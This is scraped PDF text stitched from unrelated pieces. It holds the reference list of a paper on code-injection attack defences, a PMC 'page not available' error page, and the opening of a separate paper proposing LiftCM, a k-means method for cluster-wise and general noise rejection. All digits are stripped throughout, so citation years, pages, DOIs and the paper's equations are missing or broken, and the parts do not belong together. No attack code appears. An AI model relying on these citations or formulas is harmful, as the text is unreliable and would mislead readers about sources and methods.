/j.infsof. . . http://dx.doi.org/ . /csac. . http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. halfond w. gj, orso a. . preventing sql injection attacks using amnesia. in: osterweil lj, ed. proceedings of the th international conference on software engineering, icse’ . new york: acm, – doi . / . . hedin d, birgisson a, bello l, sabelfeld a. . jsflow: tracking information flow in javascript and its apis. in: cho y, shin sy, eds. proceedings of the th annual acm symposium on applied computing, sac’ . new york: acm, – doi . / . . heffley j, meunier p. . can source code auditing software identify common vulnerabilities and be used to evaluate software security? in: proceedings of the th annual hawaii international conference on system sciences, hicss’ . washington, d.c.: ieee computer society doi . /hicss. . . hicks b, rueda s, clair st.l, jaeger t, mcdaniel p. . a logical specification and analysis for selinux mls policy. acm transactions on information and system security ( ): : – : doi . / . . holzmann gj. . the model checker spin. ieee transactions of software engineering ( ): – doi . / . . hovemeyer d, pugh w. . finding more null pointer bugs, but not too many. in: proceedings of the th acm workshop on program analysis for software tools and engineering, paste’ . new york: acm, – doi . / . . howard m, leblanc d. . writing secure code. second edition. redmond: microsoft press. jim t, swamy n, hicks m. . defeating script injection attacks with browser-enforced embedded policies. in: williamson c, zurko me, eds. proceedings of the th international conference on world wide web, www’ . new york: acm, – doi . / . . jin x, hu x, ying k, du w, yin h, peri gn. . code injection attacks on html - based mobile apps: characterization, detection and mitigation. in: ahn g-j, ed. proceedings of the acm conference on computer and communications security, ccs’ . new york: acm, – doi . / . . johns m, beyerlein c. . smask: preventing injection attacks in web applications by approximating automatic data/code separation. in: cho y, wainwright rl, haddad hm, eds. proceedings of the acm symposium on applied computing, sac’ . new york: acm, – doi . / . . johns m, engelmann b, posegga j. . xssds: server-side detection of cross-site scripting attacks. in: proceedings of the annual computer security applications conference, acsac’ . washington, d.c.: ieee computer society, – doi . /acsac. . . johnson rt. . verifying security properties using type-qualifier inference. phd thesis, berkeley, ca, usa. aai . jovanovic n, kruegel c, kirda e. . pixy: a static analysis tool for detecting web application vulnerabilities (short paper). in: proceedings of the ieee symposium on security and privacy. washington, d.c.: ieee computer society, – doi . /sp. . . mitropoulos and spinellis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . /hicss. . http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . /acsac. . http://dx.doi.org/ . /sp. . http://dx.doi.org/ . /peerj-cs. kantorovitz ip. . lexical analysis tool. acm sigplan notices ( ): – doi . / . . kc gs, keromytis ad, prevelakis v. . countering code-injection attacks with instruction-set randomization. in: jajodia s, ed. ccs’ : proceedings of the th acm conference on computer and communications security. new york: acm, – doi . / . . keromytis ad. . randomized instruction sets and runtime environments past research and future directions. ieee security and privacy ( ): – doi . /msp. . . keromytis ad. . buffer overflow attacks. in: encyclopedia of cryptography and security. second edition. – . king jc. . symbolic execution and program testing. communications of the acm ( ): – doi . / . . kiriansky v, bruening d, amarasinghe sp. . secure execution via program shepherding. in: boneh d, ed. proceedings of the th usenix security symposium. berkeley: usenix association, – . kong d, zheng q, chen c, shuai j, zhu m. . isa: a source code static vulnerability detection system based on data fusion. in: li j, lee w-c, silvestri f, eds. proceedings of the nd international conference on scalable information systems, infoscale’ . brussels, belgium: icst (institute for computer sciences, social-informatics and telecommunications engineering), : – : . kuznetsov v, szekeres l, payer m, candea g, sekar r, song d. . code-pointer integrity. in: flinn j, levy h, eds. proceedings of the th usenix conference on op- erating systems design and implementation, osdi’ . berkeley: usenix association, – . laranjeiro n, vieira m, madeira h. . protecting database centric web services against sql/xpath injection attacks. in: bhowmick ss, küng j, wagner r, eds. proceedings of the th international conference on database and expert systems applica- tions, dexa’ . berlin: springer-verlag, – doi . / - - - - _ . laranjeiro n, vieira m, madeira h. . a learning-based approach to secure web services from sql/xpath injection attacks. in: proceedings of the ieee th pacific rim international symposium on dependable computing, prdc’ . washington, d.c.: ieee computer society, – doi . /prdc. . . lee sy, low wl, wong py. . learning fingerprints for a database intrusion detection system. in: gollmann d, karjoth g, waidner m, eds. proceedings of the th european symposium on research in computer security, esorics’ . london, uk: springer-verlag, – doi . / - - - _ . lhee k-s, chapin sj. . buffer overflow and format string overflow vulnerabilities. software: practice and experience ( ): – doi . /spe. . livshits vb, lam ms. . finding security vulnerabilities in java applications with static analysis. in: proceedings of the th usenix security symposium. berkeley: usenix association, – . mitropoulos and spinellis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . /msp. . http://dx.doi.org/ . / . http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /prdc. . http://dx.doi.org/ . / - - - _ http://dx.doi.org/ . /spe. http://dx.doi.org/ . /peerj-cs. louw mt, venkatakrishnan vn. . blueprint: robust prevention of cross-site scripting attacks for existing browsers. in: proceedings of the th ieee sympo- sium on security and privacy. washington, d.c.: ieee computer society, – doi . /sp. . . martin m, lam ms. . automatic generation of xss and sql injection attacks with goal-directed model checking. in: van oorschot p, ed. proceedings of the th usenix security symposium. berkeley: usenix association, – . martin m, livshits b, lam ms. . finding application errors and security flaws using pql: a program query language. in: johnson r, ed. proceedings of the th acm conference on object oriented programming, systems, languages, and applications, oopsla’ . new york: acm press, – doi . / . . mashtizadeh aj, bittau a, boneh d, mazières d. . ccfi: cryptographically enforced control flow integrity. in: ray i, ed. proceedings of the nd acm sigsac conference on computer and communications security, ccs’ . new york: acm, – doi . / . . mattos t, santin a, malucelli a. . mitigating xml injection -day attacks through strategy-based detection systems. ieee security and privacy ( ): – doi . /msp. . . mcclure ra, krüger ih. . sql dom: compile time checking of dynamic sql statements. in: roman g-c, ed. proceedings of the th international conference on software engineering, icse’ . – doi . / . . mcgraw g. . software security: building security in. boston: addison-wesley professional. mcgraw g. . automated code review tools for security. ieee computer ( ): – doi . /mc. . . mcmillan kl. . symbolic model checking: an approach to the state explosion problem. phd thesis, carnegie mellon university. mellado d, fernández-medina e, piattini m. . security requirements engineer- ing framework for software product lines. information and software technology ( ): – doi . /j.infsof. . . . merz s. . model checking: a tutorial overview. in: cassez f, jard c, rozoy b, ryan md, eds. proceedings of the th summer school on modeling and verification of parallel processes. london: springer-verlag, – doi . / - - - _ . miller a, donaldson a, calder m. . symmetry in temporal logic model checking. acm computing surveys ( ): – . minamide y. . static approximation of dynamically generated web pages. in: ellis a, hagino t, eds. proceedings of the th international conference on world wide web, www’ . new york: acm, – doi . / . . mitropoulos d, karakoidas v, louridas p, spinellis d. . countering code injection attacks: a unified approach. information management and computer security ( ): – doi . / . mitropoulos and spinellis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /sp. . http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . /msp. . http://dx.doi.org/ . / . http://dx.doi.org/ . /mc. . http://dx.doi.org/ . /j.infsof. . . http://dx.doi.org/ . / - - - _ http://dx.doi.org/ . / . http://dx.doi.org/ . / http://dx.doi.org/ . /peerj-cs. mitropoulos d, karakoidas v, spinellis d. . fortifying applications against xpath injection attacks. in: th mediterranean conference on information systems, mcis . – . mitropoulos d, spinellis d. . sdriver: location-specific signatures prevent sql in- jection attacks. computers and security : – doi . /j.cose. . . . mitropoulos d, stroggylos k, spinellis d, keromytis ad. . how to train your browser: preventing xss attacks using contextual script fingerprints. acm trans- actions on privacy and security ( ): : – : doi . / . moonen l. . a generic architecture for data flow analysis to support reverse engineering. in: proceedings of the nd international conference on theory and practice of algebraic specifications, algebraic’ . swinton: british computer society, – . nadji y, saxena p, song d. . document structure integrity: a robust basis for cross-site scripting defense. in: proceedings of the nd annual computer security applications conference, acsac’ . washington, d.c.: ieee computer society, – . nadji y, saxena p, song d. . document structure integrity: a robust basis for cross- site scripting defense. in: proceeding of the network and distributed system security symposium (ndss). nagy c, mancoridis s. . static security analysis based on input-related software faults. in: proceedings of the european conference on software maintenance and reengineering, csmr ’ . washington, d.c.: ieee computer society, – doi . /csmr. . . nanda s, lam l-c, chiueh t-c. . dynamic multi-process information flow tracking for web application security. in: proceedings of the interna- tional conference on middleware companion, mc’ . new york: acm, – doi . / . . nguyen-tuong a, guarnieri s, greene d, shirley j, evans d. . automatically hardening web applications using precise tainting. in: sasaki r, qing s, okamoto e, yoshiura h, eds. ifip international information security conference. – doi . / - - - _ . null lm, wong j. . the diamond security policy for object-oriented databases. in: agrawal jp, kumar j, wallentine v, eds. proceedings of the acm annual confer- ence on communications, csc’ . new york: acm, – doi . / . . papagiannis i, migliavacca m, pietzuch p. . php aspis: using partial taint tracking to protect against injection attacks. in: fox a, ed. proceedings of the nd usenix conference on web application development, webapps’ . berkeley: usenix associa- tion, – . peck r, devore j. . statistics: the exploration & analysis of data. boston: brooks/cole, cengage learning. pierce bc. . types and programming languages. cambridge: mit press. pincus j, baker b. . beyond stack smashing: recent advances in exploiting buffer overruns. ieee security and privacy ( ): – doi . /msp. . . mitropoulos and spinellis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.cose. . . http://dx.doi.org/ . / http://dx.doi.org/ . /csmr. . http://dx.doi.org/ . / . http://dx.doi.org/ . / - - - _ http://dx.doi.org/ . / . http://dx.doi.org/ . /msp. . http://dx.doi.org/ . /peerj-cs. pnueli a. . the temporal logic of programs. in: proceedings of the th annual symposium on foundations of computer science, sfcs ’ . washington, d.c.: ieee computer society, – doi . /sfcs. . . qin f, wang c, li z, kim h-s, zhou y, wu y. . lift: a low-overhead practical information flow tracking system for detecting security attacks. in: proceedings of the th annual ieee/acm international symposium on microarchitecture, micro . washington, d.c.: ieee computer society, – doi . /micro. . . ray d, ligatti j. . defining code-injection attacks. in: field j, ed. proceedings of the th annual acm symposium on principles of programming languages, popl’ . new york: acm, – doi . / . . reis c, dunagan j, wang hj, dubrovsky o, esmeir s. . browsershield: vulnerability-driven filtering of dynamic html. in: bershad b, mogul j, eds. proceedings of the th symposium on operating systems design and implementation, osdi’ . berkeley, ca, usa: usenix association, – . reps t, horwitz s, sagiv m. . precise interprocedural dataflow analysis via graph reachability. in: cytron rk, lee p, eds. proceedings of the nd acm sympo- sium on principles of programming languages, popl’ . new york: acm, – doi . / . . richards g, hammer c, burg b, vitek j. . the eval that men do: a large-scale study of the use of eval in javascript applications. in: mezini m, ed. proceedings of the th european conference on object-oriented programming, ecoop’ . berlin: springer- verlag, – doi . / - - - - _ . romero-mariona j, ziv h, richardson dj, bystritsky d. . towards usable cyber security requirements. in: proceedings of the th annual workshop on cy- ber security and information intelligence research: cyber security and information intelligence challenges and strategies, csiirw’ . new york: acm, : – : doi . / . . ruse m, sarkar t, basu s. . analysis & detection of sql injection vulnerabilities via automatic test case generation of programs. in: proceedings of the th ieee/ipsj international symposium on applications and the internet, saint’ . washington, d.c.: ieee computer society, – doi . /saint. . . saiedian h, broyle d. . security vulnerabilities in the same-origin policy: implica- tions and alternatives. computer ( ): – doi . /mc. . . saxena p, akhawe d, hanna s, mao f, mccamant s, song d. . a symbolic execution framework for javascript. in: proceedings of the ieee symposium on security and privacy. washington, d.c.: ieee computer society, – doi . /sp. . . schwarz b, chen h, wagner d, lin j, tu w, morrison g, west j. . model checking an entire linux distribution for security violations. in: proceedings of the st annual computer security applications conference, acsac’ . washington, d.c.: ieee computer society, – doi . /csac. . . seixas n, fonseca j, vieira m, madeira h. . looking at web security vulnerabilities from the programming language perspective: a field study. in: proceedings of the mitropoulos and spinellis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /sfcs. . http://dx.doi.org/ . /micro. . http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / . http://dx.doi.org/ . /saint. . http://dx.doi.org/ . /mc. . http://dx.doi.org/ . /sp. . http://dx.doi.org/ . /csac. . http://dx.doi.org/ . /peerj-cs. th international symposium on software reliability engineering, issre’ . washington, d.c.: ieee computer society, – doi . /issre. . . sekar r. . an efficient black-box technique for defeating web application attacks. in: proceeding of the network and distributed system security symposium (ndss). reston: internet society. shacham h, page m, pfaff b, goh e-j, modadugu n, boneh d. . on the effective- ness of address-space randomization. in: atluri v, ed. proceedings of the th acm conference on computer and communications security, ccs’ . new york: – doi . / . . shahriar h, zulkernine m. . mitigating program security vulnerabilities: approaches and challenges. acm computing surveys ( ): : – : doi . / . . sivakumar k, garg k. . constructing a ‘‘common cross site scripting vulnerabil- ities enumeration (cse)’’ using cwe and cve. in: mcdaniel p, gupta sk, eds. proceedings of the rd international conference on information systems security. berlin: springer-verlag, – doi . / - - - - _ . son s, mckinley ks, shmatikov v. . diglossia: detecting code injection attacks with precision and efficiency. in: sadeghi a-r, ed. proceedings of the acm conference on computer and communications security, ccs’ . new york: acm, – doi . / . . son sh, chaney c, thomlinson np. . partial security policies to support timeliness in secure real-time databases. in: proceedings of the ieee symposium on security and privacy. charlottesville: ieee doi . /secpri. . . soni p, budianto e, saxena p. . the sicilian defense: signature-based whitelist- ing of web javascript. in: ray i, ed. proceedings of the nd acm conference on computer and communications security, ccs’ . new york: acm, – doi . / . . sovarel an, evans d, paul n. . where’s the feeb? the effectiveness of instruction set randomization. in: proceedings of the th usenix security symposium. berkeley: usenix association, – . spacco j, hovemeyer d, pugh w. . tracking defect warnings across versions. in: diehl s, gall h, hassan ae, eds. proceedings of the international workshop on mining software repositories, msr’ . new york: acm, – doi . / . . stamm s, sterne b, markham g. . reining in the web with content security policy. in: rappa m, jones p, eds. proceedings of the th international conference on world wide web, www’ . new york: acm, – doi . / . . stefan d, yang ez, marchenko p, russo a, herman d, karp b, mazières d. . protecting users by confining javascript with cowl. in: proceedings of the th usenix conference on operating systems design and implementation, osdi’ . berkeley: usenix association, – . mitropoulos and spinellis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /issre. . http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / . http://dx.doi.org/ . /secpri. . http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. stock b, lekies s, mueller t, spiegel p, johns m. . precise client-side protection against dom-based cross-site scripting. in: proceedings of the rd usenix security symposium. – . su z, wassermann g. . the essence of command injection attacks in web ap- plications. in: morrisett g, ed. conference record of the rd acm symposium on principles of programming languages, popl’ . new york: acm, – doi . / . . szekeres l, payer m, wei t, song d. . sok: eternal war in memory. in: sommer r, ed. proceedings of the ieee symposium on security and privacy. – doi . /sp. . . takesue m. . a protection scheme against the attacks deployed by hiding the violation of the same origin policy. in: proceedings of the second international conference on emerging security information, systems and technologies. washington, d.c.: ieee computer society, – doi . /securware. . . thuraisingham b, ford w. . security constraint processing in a multilevel secure distributed database management system. ieee transactions on knowledge and data engineering ( ): – doi . / . . trinh m-t, chu d-h, jaffar j. . s : a symbolic string solver for vulnerability detec- tion in web applications. in: ahn g-j, ed. proceedings of the acm conference on computer and communications security, ccs’ . new york: acm, – doi . / . . tsitovich a. . detection of security vulnerabilities using guided model checking. in: garcia de la banda m, pontelli e, eds. proceedings of the th international conference on logic programming, iclp’ . berlin: springer-verlag, – doi . / - - - - _ . valeur f, mutz d, vigna g. . a learning-based approach to the detection of sql attacks. in: julisch k, kruegel c, eds. proceedings of the second international conference on detection of intrusions and malware, and vulnerability assessment, dimva’ . berlin: springer-verlag, – doi . / _ . van der veen v, andriesse d, göktaş e, gras b, sambuc l, slowinska a, bos h, giuffrida c. . practical context-sensitive cfi. in: ray i, ed. proceedings of the nd acm conference on computer and communications security, ccs’ . new york: acm, – doi . / . . viega j, bloch jt, kohno t, mcgraw g. . token-based scanning of source code for security problems. acm transactions on information and system security ( ): – doi . / . . viega j, bloch jt, kohno y, mcgraw g. . its : a static vulnerability scanner for c and c++ code. in: proceedings of the th annual computer security applications conference, acsac’ . washington, d.c.: ieee computer society, . viega j, mcgraw g. . building secure software: how to avoid security problems the right way. boston: addison-wesley. vogt p, nentwich f, jovanovic n, kirda e, kruegel c, vigna g. . cross-site scripting prevention with dynamic data tainting and static analysis. in: proceeding mitropoulos and spinellis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / . http://dx.doi.org/ . /sp. . http://dx.doi.org/ . /securware. . http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / _ http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. of the network and distributed system security symposium (ndss). reston: internet society. von oheimb d. . information flow control revisited: noninfluence=noninterfer- ence +nonleakage. in: samarati p, ryan p, gollmann d, molva r, eds. proceedings of the th european symposium on research in computer security, esorics’ . springer, – doi . / - - - - _ . wagner d, foster js, brewer ea, aiken a. . a first step towards automated detec- tion of buffer overrun vulnerabilities. in: proceeding of the network and distributed system security symposium (ndss). reston: internet society, – . wang h. . attacks target web server logic and prey on xcs weaknesses: technical persepctive. communications of the acm ( ): – doi . / . . wang x, pan c-c, liu p, zhu s. . sigfree: a signature-free buffer overflow attack blocker. ieee transactions on dependable and secure computing ( ): – doi . /tdsc. . . wassermann g, su z. . an analysis framework for security in web applications. in: taylor rn, ed. savcbs : proceedings of the fse workshop on specification and verification of component-based systems savcbs, – . wassermann g, su z. . sound and precise analysis of web applications for injection vulnerabilities. in: ferrante j, ed. pldi ’ : proceedings of the acm sigplan conference on programming language design and implementation. new york: acm press, – doi . / . . wilander j, kamkar m. . a comparison of publicly available tools for static intrusion prevention. in: proceedings of the th nordic workshop on secure it systems. karlstad, sweden: karlstad university, – . winsor j. . solaris system administrator’s guide. third edition. upper saddle river: prentice hall ptr. wurster g, van oorschot pc. . the developer is the enemy. in: bishop m, probst cw, eds. nspw’ : proceedings of the workshop on new security paradigms. new york: acm, – doi . / . . wurzinger p, platzer c, ludl c, kirda e, kruegel c. . swap: mitigating xss attacks using a reverse proxy. washington, d.c.: ieee computer society, – . xie y, aiken a. . static detection of security vulnerabilities in scripting languages. in: proceedings of the th conference on usenix security symposium—volume , usenix-ss’ . berkeley: usenix association. xu w, bhatkar s, sekar r. . taint-enhanced policy enforcement: a practical approach to defeat a wide range of attacks. in: security’ : proceedings of the th usenix security symposium. berkeley: usenix association, – . younan y, joosen w, piessens f. . runtime countermeasures for code injection attacks against c and c++ programs. acm computing surveys ( ): : – : doi . / . . mitropoulos and spinellis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / . http://dx.doi.org/ . /tdsc. . http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. yu d, chander a, islam n, serikov i. . javascript instrumentation for browser security. in: hofmann m, ed. proceedings of the th acm symposium on principles of programming languages. new york: acm, – doi . / . . zitser m, group des, leek t. . testing static analysis tools using exploitable buffer overflows from open source code. sigsoft software engineering notes ( ): – doi . / . . zitser m, lippmann r, leek t. . testing static analysis tools using exploitable buffer overflows from open source code. sigsoft software engineering notes ( ): – doi . / . . mitropoulos and spinellis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. wp-p m- .ebi.ac.uk params is empty sys_ exception wp-p m- .ebi.ac.uk no params is empty exception params is empty / / - : : if (typeof jquery === "undefined") document.write('[script type="text/javascript" src="/corehtml/pmc/jig/ . . /js/jig.min.js"][/script]'.replace(/\[/g,string.fromcharcode( )).replace(/\]/g,string.fromcharcode( ))); // // // window.name="mainwindow"; .pmc-wm {background:transparent repeat-y top left;background-image:url(/corehtml/pmc/pmcgifs/wm-nobrand.png);background-size: auto, contain} .print-view{display:block} page not available reason: the web page address (url) that you used may be incorrect. message id: (wp-p m- .ebi.ac.uk) time: / / : : if you need further help, please send an email to pmc. include the information from the box above in your message. otherwise, click on one of the following links to continue using pmc: search the complete pmc archive. browse the contents of a specific journal in pmc. find a specific article by its citation (journal, date, volume, first page, author or article title). http://europepmc.org/abstract/med/ submitted june accepted october published november corresponding author seiki ubukata, subukata@cs.osakafu-u.ac.jp academic editor sebastian ventura additional information and declarations can be found on page doi . /peerj-cs. copyright ubukata distributed under creative commons cc-by . open access a unified approach for cluster-wise and general noise rejection approaches for k-means clustering seiki ubukata graduate school of engineering, osaka prefecture university, sakai, osaka, japan abstract hard c-means (hcm; k-means) is one of the most widely used partitive clustering techniques. however, hcm is strongly affected by noise objects and cannot represent cluster overlap. to reduce the influence of noise objects, objects distant from cluster centers are rejected in some noise rejection approaches including general noise rejection (gnr) and cluster-wise noise rejection (cnr). generalized rough c-means (grcm) can deal with positive, negative, and boundary belonging of object to clusters by reference to rough set theory. grcm realizes cluster overlap by the linear function threshold-based object-cluster assignment. in this study, as a unified approach for gnr and cnr in hcm, we propose linear function threshold-based c-means (liftcm) by relaxing grcm. we show that the linear function threshold-based assignment in liftcm includes gnr, cnr, and their combinations as well as rough assignment of grcm. the classification boundary is visualized so that the characteristics of liftcm in various parameter settings are clarified. numerical experiments demonstrate that the combinations of rough clustering or the combinations of gnr and cnr realized by liftcm yield satisfactory results. subjects data mining and machine learning, data science, optimization theory and computation keywords clustering, k-means, noise rejection, rough set theory introduction clustering, which is an important task in data mining/machine learning, is a technique for automatically extracting group (cluster) structures from data without supervision. it is useful for analyzing large-scale unlabeled data. hard c-means (hcm; k- means) (macqueen, ) is one of the most widely used partitive clustering techniques. real-world datasets often contain noise objects (outliers) with irregular features that may distort cluster shapes and deteriorate clustering performance. since c-means-type methods are formulated based on the minimization of the total within-cluster sum-of-squared-error, they are strongly affected by noise objects, which are distant from cluster centers. we focus on two types of noise rejection, namely, general noise rejection (gnr) and cluster-wise noise rejection (cnr). in gnr approaches, whether each object is noise or not is defined in the whole cluster structure. objects distant from any cluster center are rejected as noise. on the other hand, in cnr approaches, whether each object is noise or not is defined for each cluster. for each cluster, objects distant from its center are rejected as noise. both how to cite this article ubukata s. . a unified approach for cluster-wise and general noise rejection approaches for k-means cluster- ing. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com/computer-science mailto:subukata@cs.osakafu-u.ac.jp mailto:subukata@cs.osakafu-u.ac.jp https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. gnr and cnr perform noise rejection while gnr performs exclusive cluster assignment whereas cnr allows cluster overlap. hcm assigns each object to one and only one cluster with membership in the boolean (hard; crisp) domain { , }, and thus it cannot represent belonging to multiple clusters or non-belonging to any cluster. however, in real-world datasets, belonging of object to clusters is often unclear. soft computing approaches are useful to represent belonging to multiple clusters or non-belonging to any cluster. clustering based on rough set theory (pawlak, ; pawlak, ) considers positive, negative, and boundary belonging of object to clusters. lingras and west proposed rough c-means (lrcm) (lingras & west, ) as a rough-set-based c-means clustering, and peters proposed a refined version of rcm (prcm) (peters, ). ubukata et al. proposed the generalized rcm (grcm) (ubukata, notsu & honda, ) by integrating lrcm and prcm. grcm realizes cluster overlap by a linear function threshold with respect to the distance to the nearest cluster and detects the upper area composed of objects that possibly belong to the cluster. specifically, the threshold based on the distance to the nearest cluster center is lifted by the linear function to allow the cluster to be assigned to relatively near clusters as well as the nearest cluster. in this study, we investigate the characteristics of the linear function threshold-based object-cluster assignment in grcm. we show that the linear function threshold-based assignment in relaxed grcm can realize gnr, cnr, and their combinations as well as rough assignments. one important point is that the linear function threshold-based assignment essentially includes gnr and cnr in compliance with rcm standards without any extra formulation. as a unified approach for gnr and cnr in hcm, we propose linear function threshold-based c-means (liftcm) by relaxing grcm. the classification boundary is visualized so that the characteristics of liftcm in various parameter settings are clarified. numerical experiments demonstrate that the combinations of rough clustering or the combinations of gnr and cnr realized by liftcm yield satisfactory results. the remainder of the paper is organized as follows. in ‘‘related work,’’ related works are discussed. ‘‘preliminaries’’ presents the preliminaries for clustering methods. in ‘‘a unified approach for cluster-wise and general noise rejection approaches,’’ we show that the linear function threshold-based assignment in relaxed grcm can realize gnr, cnr, and their combinations as well as rough assignments. in ‘‘proposed method,’’ we propose liftcm as one of the relaxed grcm. in ‘‘visualization of classification boundaries,’’ the classification boundaries of liftcm with various parameter settings are considered. in ‘‘numerical experiments,’’ the clustering performance of liftcm with various parameter settings is discussed. in ‘‘discussion,’’ the calculation of the cluster center in the proposed method are discussed. finally, the conclusions are presented in ‘‘conclusions.’’ related work noise rejection in regression analysis and c-means-type clustering many machine learning tasks such as regression analysis are formulated in a framework of least mean squares (lms) proposed by legendre or gauss (legendre, ; gauss, ), ubukata ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. which minimizes the sum of the squared residuals to fit models to a dataset. however, since the lms criterion is strongly affected by noise objects and has the lack of robustness, various robust estimation methods have been proposed to reduce the influence of noise objects. least absolute values (lav) (edgeworth, ) is a criterion that minimizes the sum of the absolute values of the residuals to reduce the influence of large residuals. m-estimator (huber, ; huber, ) is one of the most widely used robust estimators, which replaces the square function in lms by a symmetric function with a unique minimum at zero that reduces the influence of large residuals. least median of squares (lmeds) (hampel, ; rousseeuw, ) minimizes the median of the squared residuals. least trimmed squares (lts) (rousseeuw & leroy, ) minimizes the sum of the squared residuals up to h-th objects in ascending list of residuals. since c-means-type clustering methods are generally formulated based on the minimization of the within-cluster sum-of-squared-error, the above-mentioned robust estimation methods are promising approaches to noise in the cluster structure (kaufmann & rousseeuw, ; dubes & jain, ). in c-means-type clustering, the distance between object and its nearest cluster center is identified as the residual. thus, in gnr, objects distant from any cluster center are rejected as noise. for instance, trimmed c-means (tcm; trimmed k-means, tkm) (cuesta-albertos, gordaliza & matrán, ; garcia- escudero & gordaliza, ) introduces lts criterion to hcm. tcm calculates the new cluster center by using objects up to h-th in ascending list of the distances to their nearest cluster centers. as a result, objects more than a certain distance away are rejected as noise. noise rejection in c-means-type clustering is also well discussed in the context of fuzzy c-means (fcm) (dunn, ; bezdek, ). in noise fuzzy c-means (nfcm) (davé, ; davé & krishnapuram, ), a single noise cluster is introduced in addition to the intended regular clusters and objects distant from any cluster center are absorbed in the noise cluster. another approach to noise is cnr. for instance, possibilistic c-means (pcm) (krishnapuram & keller, ; krishnapuram & keller, ) considers cluster-wise noise rejection, in which each cluster is extracted independently while rejecting objects distant from its center. the membership values are interpreted as degrees of possibility of the object belonging to clusters. pcm represents typicality as absolute membership to clusters rather than relative membership by eliminating the sum-to-one constraint. fuzzy possibilistic c-means (fpcm) (pal, pal & bezdek, ) uses both relative typicalities (memberships) and absolute typicalities. possibilistic fuzzy c-means (pfcm) (pal et al., ) is a hybridization of fcm and pcm using both probabilistic memberships of fcm and possibilistic memberships of pcm. in this study, we show that gnr, cnr, and their combinations are realized by the linear function threshold-based object-cluster assignment in the proposed liftcm. the above-mentioned approaches introduce various mechanisms to realize gnr and cnr. in contrast, the linear function threshold-based assignment essentially includes gnr, cnr, and their combinations in compliance with rcm standards without any extra formulation. ubukata ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. generalized approaches to hard, fuzzy, noise, possibilistic, and rough clustering maji & pal ( a) proposed rough-fuzzy c-means (rfcm) as a hybrid algorithm of fcm and rcm. rfcm is formulated so that objects in the lower areas have crisp memberships and objects in the boundary areas have fcm-based fuzzy memberships. furthermore, maji & pal ( b) proposed rough-fuzzy possibilistic c-means (rfpcm) based on possibilistic fuzzy c-means (pfcm) (pal et al., ). masson and denœux proposed evidential c-means (ecm) (masson & denoeux, ) as one of the evidential clustering (evclus) (denoeux & masson, ; denoeux & masson, ) methods based on the dempster-shafer theory of belief functions (evidence theory). evidential clustering considers the basic belief assignment, which indicates the membership (mass of belief) of each object to each subset of clusters with the probabilistic constraints that derive credal partition. credal partition can represent hard and fuzzy partitions with a noise cluster considering assignments to a singleton and the empty set. possibilistic and rough partitions are represented by using the plausibility function and the belief function (denoeux & kanjanatarakul, ). although rfcm and rfpcm provide interesting perspectives on the handling of the uncertainty in the boundary area, the object-cluster assignment is different from that of rcm and transform into different types of approach. although the credal partition in ecm has high expressiveness including hard, noise, possibilistic, and rough clustering, the object-cluster assignment and cluster center calculation of ecm do not boil down to those of rcm. in contrast to the above-mentioned approaches, the formulation of the proposed liftcm is fully compliant with rcm standards. this study reveals that rcm itself inherently includes gnr, cnr, and their combinations as well as rough clustering aspects without any extra formulation. preliminaries hard c-means and noise rejection let u ={x ,...,xi,...,xn} be a set of n objects, where each object xi=(xi ,...,xij,...,xip)> is a p-dimensional real feature vector. in c-means-type methods, c ( ≤c <n) represents the number of clusters, and c clusters composed of similar objects are extracted from u . each cluster has a prototypical point (cluster center), which is a p-dimensional vector bc = (bc ,...,bcj,...,bcp)>. let uci be the degree of belonging of object i to cluster c. let dci=||xi−bc|| be the distance between the cluster center bc and the object i. the optimization problem of hcm (macqueen, ) is given by min. jhcm = c∑ c= n∑ i= ucid ci, ( ) s.t. uci∈{ , },∀c,i, ( ) c∑ c= uci= ,∀i. ( ) ubukata ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. hcm minimizes the total within-cluster sum-of-squared-error (eq. ( )) under the boolean domain constraints (eq. ( )) and the sum-to-one constraints across clusters (eq. ( )). hcm first initializes cluster centers and then alternately updates uci and bc until convergence by using the following update rules: uci=   ( c =argmin ≤l≤c dli ) , (otherwise), ( ) bc = ∑n i= ucixi∑n i= uci . ( ) there are various strategies for initializing 